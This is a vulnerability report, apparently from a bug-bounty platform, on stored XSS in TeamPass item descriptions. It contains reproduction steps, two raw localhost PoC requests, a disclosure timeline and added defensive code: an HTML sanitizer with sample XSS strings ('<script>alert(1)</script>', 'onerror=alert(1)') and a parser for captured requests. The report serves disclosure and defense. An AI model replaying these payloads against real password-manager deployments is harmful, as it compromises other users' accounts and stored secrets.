Stored XSS on function item with folder in nilsteampassnet/teampass

Valid

Reported on

Apr 5th 2023


Description

Create two accounts and give both access to the same folder.
With the first account, create a new item in that folder; in the description parameter, switch to code view and paste the XSS payload.
Save, then click the item: an XSS alert is shown. Log in with the other account, open the folder and click the item: the same XSS alert is shown.
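The root cause described above is that the editor's code view lets a user store raw HTML in the description, which is then rendered unchanged to every user who can see the folder. The following is an added example, not TeamPass code and not the fix in commit 77c541: a stand-alone allow-list sanitizer (Python standard library, whereas TeamPass itself is PHP) of the kind a stored rich-text field needs before it is rendered. The tag and attribute allow-list is an assumption chosen for illustration; script and style content is dropped entirely, event-handler and style attributes are removed, and only http, https and mailto links survive.

```python
"""Allow-list sanitizer for a rich-text item description.

Added example, not TeamPass code. Only a small set of tags and attributes
survive; <script>/<style> content is dropped, on* handlers are removed,
href values must use a safe scheme, and the output is kept balanced.
"""
import html
from html.parser import HTMLParser

# Assumed allow-list for illustration; a real deployment tunes this.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no style
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class AllowListSanitizer(HTMLParser):
    """Rebuilds the input from parsed tokens, keeping only allow-listed parts."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # allow-listed tags still open, for balancing
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return            # img, svg, iframe, ... are dropped outright
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue      # drops onerror=, onclick=, style=, ...
            value = value or ""
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_SCHEMES):
                continue      # drops javascript:, data:, vbscript: links
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        # Close everything opened after `tag` so the output stays balanced.
        while self.open_tags:
            opened = self.open_tags.pop()
            self.out.append(f"</{opened}>")
            if opened == tag:
                break

    def handle_data(self, data):
        # Text is re-escaped, so entities decoded by the parser cannot re-form tags.
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    # Comments, processing instructions and declarations are dropped by default.

    def result(self):
        self.close()
        while self.open_tags:                 # balance any unclosed tags
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_description(raw_html):
    """Return an allow-listed version of `raw_html` that is inert when embedded in a page."""
    s = AllowListSanitizer()
    s.feed(raw_html)
    return s.result()


if __name__ == "__main__":
    # Constructed sample inputs, not taken from the report.
    samples = [
        "<p>Backup <b>credentials</b> for <a href='https://example.test/'>vault</a></p>",
        "<p>note</p><script>alert(1)</script>",
        "<img src=x onerror=alert(1)>text",
        "<a href='javascript:alert(1)' onclick='x()'>link</a>",
        "<b>unclosed",
    ]
    for raw in samples:
        print(repr(raw), "->", repr(sanitize_description(raw)))
```

The filter belongs on the server, after the request envelope has been decrypted and before the description is stored (and output encoding still applies at render time); a client-side check in the editor can be bypassed by sending the request directly, as the PoC below does.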

Proof of Concept

Clone the project with git and set it up.
Latest commit: f6416bd763f99b1016a3991c17a49efb0e853294


Create:

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1610
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: c8d6b9a0a8b4543c794b1fef4252e207b01f3b097a77a2c032=3dadb4413c2b2092a59dfb98885b0289b89236ac65a4969878; teampass_session=53614e3s2bermcqa1pndeju249; jstree_select=4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=new_item&data=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&key=3pCa7RTf3hpHgw2FVuxgvbky3Gcem42y4YzJa5q57yyAvhVL4X


Update:

POST /teampass/sources/items.queries.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1613
Origin: http://localhost
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: c8d6b9a0a8b4543c794b1fef4252e207b01f3b097a77a2c032=3dadb4413c2b2092a59dfb98885b0289b89236ac65a4969878; teampass_session=53614e3s2bermcqa1pndeju249; jstree_select=4
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

type=update_item&data=eyJjaXBoZXJ0ZXh0IjoiZTFWYzdUNlVsSzhMQ2lEZ2ZCaUlpS0s5UThZTjRHNThNaE8wdkVsZUpzK0pkNmNjemZYVjUvdjNZQ3IyMExTanpjZTVLczNPTWdWMmNrcE1DN0ZsWGZQTDU1OGdKVzlXQnlydXdUTGswNlhoQ281RkkzZGFPZml4R3JXUHVMM3prMWQ5Q2g1emRJZzZyRE4rOUtYUDRBcWtPNE5FdWRweFdGUXlheE5YMmtJRmxaYjhSRlpOQ0Z3UU5iMll2eXZwQXZhVlVQNExROHQ4SHhGczBZVld6OGRIc1lzSWNHOFl2S3VxSEdKWi8zRDU2clVmYkthd01FeDVnS1kyL2VvWk0zMGhIRFRwRXN4RkJPZ05oaUxqZ21xOEw3RUFxT3lOTzRTL2lkRzQxa3hNaW9WNkpOV0ZLY0xkMHZScVhUeHVaNGx4cVR3aGh2NXN4NHVRUmJod2UvbSt1cjNhNDBFR0NMc0w3bW0xcVkyN2JUaVhvSHFCRXlRSy9uOU9ZeitNR215MmRDMUpiT2E2aEdiYlY1aW9uTW1aM0FTWUtzNjZoaXNNVnVFdUxDdmszNXZtMUZGL1RNa0NDamFOb0FrY0hOU01NdDFjL1ZWTmd4K2ZoRjA1VjZ4V3ZBS1YzZzRraDYwZmlWbjFxb1gyajVIcmxPcENlL01yWkNITnQ3eUtKckQxOUdyb3FYZmlWNHVoYi9VQXJabDhFaFVNYWpOSGFLWHZSNDVOVTJNPSIsIml2IjoiN2E0ZmMwMjIxYTgxMmNhYjExNjUxMjc5NDM3NWYxMmIiLCJzYWx0IjoiNGNiZjg3ODBhOGIzZTBmZmY2MzY3ODZjOGY3MjFiYjZhNTZiYTBlMzIxZTg5YjZmM2E1YjdiZWJiMzJiMWI2MjA3OGJiZGM5MzM1MzY4YTI4ZDRmZGM3NGI0MzJhODY2OTA0ZDlkYjc2ODcyZmZkNmU4MWE3MTA2NDMzYTEwODE1MGIyNWY5NDJiZmFjZGU0NWU2NmYwNWUzYzQ2MWIwYjM3NzkyZmExM2I2ZWQxNmU4MTc1ZjZmZjZlOTgxMGU5MTRjMGNhNDEwYzU3NTcwMzAxMzU0YmNlZDNhYmU4MjYyODU3NzBiN2E4ZGEwOGEwMjVkNTQ3YjY5MGE5MGNiZTg3ZTJmZTQ2MjY5Mjg0ZTk2NGMwN2E1NmMyZDNjODM5NzMwOTFkM2JjZThkYTM0ZWQ5Yjg5OGYyY2I3ZTA4NjQwM2VhYmU2MTgwMmU3NTgxYWU4OGM5NjgxY2I0OTYxNTA3MTExODJlZWEzMjFjNGQ2MGMwOTdmMGUxYzdiZGM5YzQ4YjAyM2JmYThmYWQwYzMyODljMjhiZjVlOTA2YWMxNjVkYTA5YjIwMjU5ZjUxYzYwZTg4ZDUyMDkzNmQxYTlmNjU4NzViNWE0ODIwMDdiMjkzMjhkYmM2NTBkMjlkNTg0NGUzNmYwYjI4NzFmYTkzZTM4YWE4NjY2Y2I1ZjQiLCJpdGVyYXRpb25zIjo5OTl9&key=3pCa7RTf3hpHgw2FVuxgvbky3Gcem42y4YzJa5q57yyAvhVL4X

[Image: create item]

[Image: XSS alert]
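Both PoC requests carry `type=<action>&data=<base64>&key=<session key>`, and the `data` value decodes to a JSON envelope with the fields `ciphertext`, `iv`, `salt` and `iterations` (visible when the update request's body is decoded). The following added example, not TeamPass code, parses such a captured body for triage and checks the envelope's shape. It assumes, as the PoC implies, that the item fields including the description sit inside `ciphertext`, so a request-level filter cannot see the payload and sanitization has to happen server-side after decryption. The sample body is constructed, with a placeholder session key and made-up iv, salt and ciphertext values.

```python
"""Decode the `data` parameter of a captured items.queries.php request.

Added example, not TeamPass code. Extracts the base64-encoded JSON
envelope (ciphertext, iv, salt, iterations) from a form-encoded body and
reports shape problems, so a reviewer can see what a request carries.
"""
import base64
import binascii
import json
from urllib.parse import parse_qs, urlencode


def decode_data_param(b64):
    """Base64-decode the `data` value and parse the JSON envelope.

    Tolerates stripped '=' padding and a '+' that a naive form decoder
    turned into a space (a common pitfall with base64 in form bodies).
    """
    b64 = b64.replace(" ", "+")
    padded = b64 + "=" * (-len(b64) % 4)
    return json.loads(base64.b64decode(padded).decode("utf-8"))


def parse_items_request(body):
    """Split a form-encoded body into action, session key and decoded envelope."""
    fields = parse_qs(body, keep_blank_values=True)
    return {
        "type": fields.get("type", [""])[0],
        "key": fields.get("key", [""])[0],
        "envelope": decode_data_param(fields.get("data", [""])[0]),
    }


def envelope_problems(env):
    """Return a list of shape problems; an empty list means the envelope is well formed."""
    problems = []
    for field in ("ciphertext", "iv", "salt", "iterations"):
        if field not in env:
            problems.append(f"missing {field}")
    if problems:
        return problems
    try:
        base64.b64decode(env["ciphertext"], validate=True)
    except (binascii.Error, ValueError):
        problems.append("ciphertext is not valid base64")
    for hex_field in ("iv", "salt"):
        try:
            bytes.fromhex(env[hex_field])
        except ValueError:
            problems.append(f"{hex_field} is not hex")
    if not isinstance(env["iterations"], int) or env["iterations"] <= 0:
        problems.append("iterations must be a positive integer")
    return problems


# Constructed sample in the shape of the PoC; every value is made up.
SAMPLE_ENVELOPE = {
    "ciphertext": base64.b64encode(b"\x00" * 32).decode(),
    "iv": "00112233445566778899aabbccddeeff",
    "salt": "a1b2c3d4e5f60718293a4b5c6d7e8f90",
    "iterations": 999,
}
SAMPLE_BODY = urlencode({
    "type": "update_item",
    "data": base64.b64encode(json.dumps(SAMPLE_ENVELOPE).encode()).decode(),
    "key": "SESSIONKEY_PLACEHOLDER",  # hypothetical, not the PoC's key
})

if __name__ == "__main__":
    req = parse_items_request(SAMPLE_BODY)
    print(req["type"], sorted(req["envelope"]), envelope_problems(req["envelope"]))
```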

Impact

If successful, a cross-site scripting attack can severely impact websites and web applications, damaging their reputation and their relationships with customers. XSS can deface websites, compromise user accounts, and run malicious code on web pages, which can lead to a compromise of the user's device.

We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. 2 months ago
TuanTH modified the report 2 months ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back 2 months ago
nilsteampassnet/teampass maintainer has acknowledged this report a month ago
Nils Laumaillé validated this vulnerability a month ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Nils Laumaillé marked this as fixed in 3.0.3 with commit 77c541 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 9th 2023
Nils Laumaillé published this vulnerability a month ago
TuanTH (Researcher), a month ago:

@nilsteampassnet, I checked on commit 77c541a0151841d1f4ceb0a84ca391e1b526d58d. This issue was fixed.
